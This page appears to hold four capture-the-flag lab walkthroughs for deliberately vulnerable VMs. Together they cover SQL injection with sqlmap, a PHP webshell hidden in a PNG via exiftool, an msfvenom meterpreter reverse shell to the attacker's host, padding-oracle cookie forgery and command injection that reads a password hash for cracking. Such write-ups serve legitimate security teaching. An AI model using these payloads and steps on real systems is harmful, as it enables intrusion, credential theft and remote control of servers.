Hack the Pentester Lab: from SQL injection to Shell II (Blind SQL Injection)

Today we are going to perform penetration testing with part II of previous lab, download it frohere. Now install the iso image in VM ware and start it. In this lab task level is intermediate and challenge is to gain access of administration console and then upload a PHP webshell.

Start Kali Linux then open the terminal and type netdiscover command for scanning network. Here 192.168.1.102 is my target IP which is shown in the screenshot. Now explore this IP in browser.

When you will open target IP in browser you will get a web page having heading My Awesome Photoblog. On the top of left side it contains some tags: home; test; ruxcon; 2010; all pictures; admin. Now Click on test.

The given URL: http://192.168.1.102/cat.php?id=1 will run sql query for ID 1 now let try to find out whether the above URL is vulnerable to sql injection or not by adding(‘) apostrophe at last of URL:

http://192.168.1.102/cat.php?id=1as it is not vulnerable. I didn’t get any error message like I have got in its part 1then I try to find out whether the other IDs is vulnerable or not but here also I found nothing. 

Now use nikto to scan the target for any vulnerability and type following command.

Nikto –h 192.168.1.102

 Look over the highlighted part in screenshot; from the result, it tells that X-Content-Type-Option header is not set.

Then I had used acunetix to scan the target which has declared the level of threat is high for blind sql injection.

Hence it is clear that exploit the target through sql injection.

Now type the following command for blind sql injection using sqlmap

sqlmap -u “http://192.168.1.102/cat.php?id=1″ –headers=”X-Forwarded-For: *” –dbs –batch

 Now try sql injection for header; the target application might be designed with X-Forwarded-For header which is used to run application behind a reverse-proxy.

Our assumption is correct above header is vulnerable to sql injection and I have got database name photoblog.

Now let’s fetch entire data under photoblog database through following command:

sqlmap -u “http://192.168.1.102/cat.php?id=1″ –headers=”X-Forwarded-For: *” –D photoblog –dump-all –batch

Here Task was to gain access of administration console for which we required the login: password of his account. Through sqlmap command we have got login as admin and password as P4ssw0rd.

Now try to use above credential to access administration console, again open target IP: 192.168.1.102 in browser and click on admin tab present on the top of left side and type login as admin and password as P4ssw0rd.

Congrats!!! The first task is completed.

Now last task is to upload a PHP webshell. Under administration console you will notice a link Add a new picture for uploading an image in this web server. Click on Add a new picture to upload image.

Here we can upload image through Add option now I will try to upload PHP webshell

I try to upload php malicious file using .php extension; double extension .php.jpg; also used case sensitive extension like PHP, pHP but every time failed to upload backdoor and following web page gets open.

Then I had used exiftool for hiding the malicious code inside the png image. For this step you need to download an image and save it on desktop now prepare a php file by typing following malicious code in a text file to create command injection vulnerability and save it with .php extension as I have saved with raj.php on the desktop.

<?php $cmd=$GET[‘cmd’]; system($cmd); ?>

 Now type command for exiftool to hide malicious code of php file inside the png image

Cd Desktop

Exiftool “-comment<=raj.php” 1.png

Exiftool 1.png

 From screenshot you can perceive I have three files on desktop one for php as raj.php another for downloaded image as 1.png original and third php webshell as 1.png

Now I had browse 1.png to add it as new image which is our php webshell.

Our malicious file successfully uploaded on web server. You can see a new row is added as webshell php which contains our backdoor raj.php, now click on webshell php.

Here is our malicious image; now right click on it and click view image tag.

Here this image will get opened in separate window and if you remembered its contains malicious code of command injection.

Here I try to execute ls command by adding /cmd.php?cmd=ls/etc at the end of the URL and from screenshot you can analysis this page is encoded.

Now last option is to use repeater under burp suite to execute the commands. Start burp suite and set manual proxy of browser then open the web page where “you are hacked image” is uploaded.

Now capture the cookies through burp suit and sent the intercepted data to repeater option by making right click on its window.

Now change the header from /show.php?id=4 into /admin/uploads/1484502823.png/cmd.php?cmd=ls now click on GO tab to send this request for getting response and when you will scroll down  (response) here I found some information through ls command.

Great!!!  We have completed both tasks.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Hack the Pentester Lab: from SQL injection to Shell VM

Today we are going to perform penetration testing in another lab, download it from here. Now install the iso image in VM ware and start it. The task given in this lab is to gain access of administration console and upload PHP webshell.

Start your Kali Linux then open the terminal and type netdiscover command for scanning network. Here 192.168.0.105 is my target IP which is shown in the screenshot. Then explore this IP in browser

When you will open target IP in browser you will get a web page having heading My Awesome Photoblog. On the top of left side it contains some tags: home; test;  ruxcon; 2010; all pictures; admin. Now Click on test.

The above URL: http://192.168.1.105/cat.php?id=1 will run query for ID 1 now let try to find out whether the above URL is vulnerable to sql injection or not by adding at last of URL:

http://192.168.1.105/cat.php?id=1. And I have got a message of sql error.

It confirms that this web page is suffering from sql vulnerability. Now I am making use of sqlmap tool to enumerate database name and then try to fetch entire data under that database. First of all type following command to enumerate database name:

sqlmap -u “192.168.0.105/cat.php?id=1” –dbs

If you remembered the title of web page was “A Awesome Photoblog” hence name of database must be photoblog.

Now let’s fetch entire data under photoblog database through following command:

sqlmap –u “192.168.0.105/cat.php?id=1” –D photoblog –dump-all

The first task was to gain access of administration console for which we required the login: password of his account. Through sqlmap command we have got login as admin and password as P4ssw0rd

Now try to use above credential to access administration console, again open target IP: 192.168.0.105 in browser and click on login tab and type login as admin and password as P4ssw0rd.

Congrats!!! The first task is completed.

Now last task is to upload PHP webshell. Under administration console you will see a link Add a new picture to upload an image in this web server. Click on Add a new picture to upload image.

Here we can upload image through Add option now I will try to upload PHP webshell instead of picture.

Let’s prepare the malicious file that you would upload with msfvenom :

msfvenom -p php/meterpreter/reverse_tcplhost=192.168.0.104 lport=4444 -f raw. 

Copy the code from <?php to die() and save it in a file with .pHP extension. I have saved the backdoor as shell.pHP on desktop and will later browser this file to upload on web server.

 Now load metasploit framework by typing msfconsole and start multi/handler

 Move back to admin account and then give title “shell”, click on browse to browse shell.pHP and then click on Add.

Note: it will reject the file if you saved the file as shell.php, used capital letter for extension like: PHP, pHP.

Our malicious file successfully uploaded on web server. You can see a new row is added as shell which contains our backdoor shell.pHP, now to execute backdoor click on shell and you will get reverse connection at multi handler.

msf> use multi/handler

msf exploit(handler) > set payload php/meterpreter/reverse_tcp

msf exploit(handler) > set lport 4444

msf exploit(handler) > set lhost 192.168.0.104

msf exploit(handler) > exploit

meterpreter>sysinfo

 Wonderful!!! We completed our last challenge also here we have victim web shell.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Hack the Padding Oracle Lab

The main purpose to solve this lab was to share the padding oracle attack technique with our visitors

The padding oracle attack enables an attacker to decrypt encrypted data without knowledge of the encryption key and used cipher by sending skillful manipulated cipher texts to the padding oracle and observing of the results returned by it. This causes loss of confidentiality of the encrypted data. E.g. in the case of session data stored on the client side the attacker can gain information about the internal state and structure of the application. A padding oracle attack also enables an attacker to encrypt arbitrary plain texts without knowledge of the used key and cipher. If the application assumes that integrity and authenticity of the decrypted data is given, an attacker could be able to manipulate internal session state and possibly gain higher privileges.

www.owasp.org/index.php/Testing_for_Padding_Oracle

 First you need to download padding oracle from here. Now install the iso image in VM ware and start it.

Start kali Linux as well as explore target IP: 192.168.1.29 on browser. Now at this point you need to create a user account, click on register option.

Now register username with its password and then login to exploit this vulnerability. I registered as raj: 123

Once you create a user account get on login panel and at the same time make use of burp suite to capture the cookies.

Turn up burp suite and don’t forget to set manual proxy of your browser. Now open proxy tab and hit intercepts on button to capture the request of target. When this is done you will get fetched data under intercept window. Here you will find that I try to login with credential raj: 123

Now right click on its window and a list of options will appear. Further click on send to repeater. Come across over screenshot here you will find two panel left and right for request and response respectively.

In left panel send username: raj and password: 123 as request; click on GO button to forward this request and which will further generate a cookie for auth as response in right panel.

Copy the highlighted cookie and this will be use in below command.

Next open terminal to run following command which contains target URL plus above copied cookie

padbuster http://192.168.1.102/login.php wJRTrRORayKbhI2aKPHxniQ6DEAHi7WG 8 –cookies auth=wJRTrRORayKbhI2aKPHxniQ6DEAHi7WG –encoding 0

 Python-paddingoracle is a Python implementation heavily based on PadBuster, an automated script for performing Padding Oracle attacks, developed by Brian Holyfield of Gotham Digital Science. Above command will decrypt the encrypted value of auth into plaintext. Further type 2 where it asked ID recommended.

Last part of screenshot has captured three decrypt values in base64, HEX and ASCII. The cookie of auth is combination of username with its password from padbuster we come to know what is encrypted value of username for raj.

We are very near to our goal just encrypt this auth cookie with user as admin once again. Here we have our plaintext as admin and lets encode it using padbuster.

padbuster http://192.168.1.102/login.php wJRTrRORayKbhI2aKPHxniQ6DEAHi7WG 8 –cookies auth=wJRTrRORayKbhI2aKPHxniQ6DEAHi7WG –encoding 0 –plaintext user=admin

Further type 2 where it asked ID recommended.

Here the highlighted part is our encrypted value for admin. Copy It”BAit——–AAAA”.

Go to burp suit once again and click on params under intercept frame; it contains two fields as username and password, now add third field for auth value. Click on ADD button on the right side of frame which will add another row in params.

Here it has three columns: type, name, and value; paste the above encrypted value in these columns as type: cookie, name: auth, value: BAit——AAAAAA which we have got from padbuster. Then Click on forward to send this request on web server.

Again click on forward to send it.

As request sent by burp suite automatically on web server you will get logged in as admin account.

Congrats!!! We meet the goal of this lab.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Hack the Fortress VM (CTF Challenge)

Previously you have breach many vulnhub CTF, today we will try to breach FORTRESS VULNHUB CTF.

Download it from here. Start Kali Linux and follow  these steps.

 Open terminal in Kali Linux and run this command.

Netdiscover

This command will scan your network and give you victim IP: 192.168.0.105

Now scan particular IP with aggressive scan using Nmap tool as given in image below.

Nmap –p- -A 192.168.0.105

Here it illustrate the open ports and running services on it. As shown port 22, 80, 443 are open to penetrate more inside it

Open IP in browser by typing 192.168.0.105 in URL and you will get such kind of web page in brower’s window.

After making lots of efforts I decided to use dirbuster to seek inside the directory of target.  Type dirbuster on terminal and automatically OWASP dirbuster window gets open. Here browse your dictionary from /usr/share/dirbuster/wordlists and choose your appropriate wordlist as I select medium.txt, do not forget to address target URL in top of text field as: http//192.168.0.105 and finally hit start button.

Luckly!!! I found something which is scanner.php file

Now visit this page through browser and make it open by running

URL:http//192.168.0.105/scanner.php and have a look over this colorful page. It is asking to scan the target IP which is looking very similar like OS command injection.  Though I tried to breach it through some kind of command injection but hard luck all seems waste here.

So when I trigger the localhost IP we got result of Nmap scan which you can perceive from below image.

Now turn up burp suite and don’t forget to set manual proxy of your browser. Click to proxy tab and hit  intercept is on button to capture the request of target. When this is done you will get fetched data under intercept window.

Now make right click on its window and such kind of action list will put on view further click to send to repeater.

Means now I can try to execute those commands through repeater which got fail when I trigger them in web page.

Look over screenshot here you will find two panel left and right for request and response respectively.

Type ls as request and click on go tab. This will generate response to request you made.

Request: ls

Response: index.html

      k1ngd0m_k3yz

      logo.png

      s1kr3t

      scanner.php

      styles.css

Awesome!!!  It shows list of some directories.

Now again make request using command: Ls k1ngd0m_k3yz and response generated by this command dump two sub folders as master and passwd. Now go through them one by one.

Request: Ls k1ngd0m_k3yz

Response: master and passwd

 

Now repeat the process till last step of making request and getting response through repeater.

Request: cat k1ngd0m_k3yz/master        

Response:craven:$6$qAgPM2TEordSoFnH$4uPUAhB.9rORkWExA8jI0Sbwn0Bj50KAK0tJ4rkrUrIkP6v.gE/6Fw9/yn1Ejl2TedyN5ziUz8N0unsHocuks.:1002:1002::0:0:User &:/home/craven:/bin/sh

Save the highlighted response in leafpad as hash.txt on desktop.

Request: cat k1ngd0m_k3yz/passwd

Response: craven:*:1002:1002:User &:/home/craven:/bin/sh

Request: ls s1kr3t

Response: flag.txt

Request: cat s1kr3t/flag.txt

Response: FLAG{n0_one_br3aches_teh_f0rt}

Nice!!!  We had catch our very first FLAG.

Now find other flags, by using the find command.

Request: find / -name flag.txt

Response: /usr/local/www/apache24/data/s1kr3t/flag.txt
/usr/home/vulnhub/flag.txt
/usr/home/craven/flag.txt

 

Request: ls -lah /usr/home/craven

Response: drwxr-xr-x  2 craven  craven   512B Nov  9 19:58 .
drwxr-xr-x  4 root    wheel    512B Nov  5 01:59 ..
-rw-r–r–  1 craven  craven   1.0K Nov  5 01:59 .cshrc
-rw——-  1 craven  craven     5B Nov  7 20:24 .gdb_history
-rw-r–r–  1 craven  craven    60B Nov  7 20:36 .gdbinit
-rw-r–r–  1 craven  craven   254B Nov  5 01:59 .login
-rw-r–r–  1 craven  craven   163B Nov  5 01:59 .login_conf
-rw——-  1 craven  craven   379B Nov  5 01:59 .mail_aliases
-rw-r–r–  1 craven  craven   336B Nov  5 01:59 .mailrc
-rw-r–r–  1 craven  craven   802B Nov  5 01:59 .profile
-rw——-  1 craven  craven   281B Nov  5 01:59 .rhosts
-rw-r–r–  1 craven  craven   978B Nov  5 01:59 .shrc
-r——–  1 craven  craven    46B Nov  6 01:30 flag.txt
-rw-r–r–  1 craven  craven   119B Nov  5 02:23 hint.txt
-rw-r–r–  1 craven  craven    77B Nov  5 02:20 reminders.txt

Request: cat /usr/home/craven/reminders.txt

Response: To buy:

* skim milk

* organic free-run eggs

* dog bone for qwerty

* sriracha

Request: cat /usr/home/craven/hint.txt

Response: Keep forgetting my password, so I made myself a hint. Password is three digits followed by my pet’s name and a symbol.

Crunch is a wordlist generator where you can specify a standard character set or a character set you specify. Crunch can generate all possible combinations and permutations.

Run crunch command interminal as crunch 10 10 -t %%%qwerty^ > pass.txt

Now crack the password using by typing following command in terminal

Cd Desktop

 john -wordlist=pass.txt hash.txt

 931qwerty? is password for craven as you can perceive from screenshot. 

If you remember the result from nmap which shows port 22 is open now try to connect the target through SSH using above credential.

Ssh craven@192.168.0.105

$ pwd
/usr/home/craven
$ cat flag.txt
FLAG{w0uld_u_lik3_som3_b33r_with_ur_r3d_PiLL}

Wonderful!!!  We have caught  second FLAG  also.

$ cd /home/vulnhub

$ pwd

/home/vulnhub

$ ls

flag.txt  reader

$ cat flag.txt

cat: flag.txt: Permission denied

$ ./reader

./reader [file to read]

$ ./reader flag.txt

Here it not providing access to read this file.

 Now move inside the tmp folder to read the flag.txt

$ cd /tmp

$ ls

$ ln /home/vulnhub/flag.txt raj

$ cd /home/vulnhub

$ ./reader /tmp/raj

FLAG{its_A_ph0t0_ph1ni5h}

Great!!!  We meet the goal by capture all three flags and this last FLAG is third.

ln command is basically a linux command which is used to create a link to file TARGET with the name LINKNAME. Read more visit http://www.computerhope.com/unix/uln.htm

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Related Posts Plugin for WordPress, Blogger...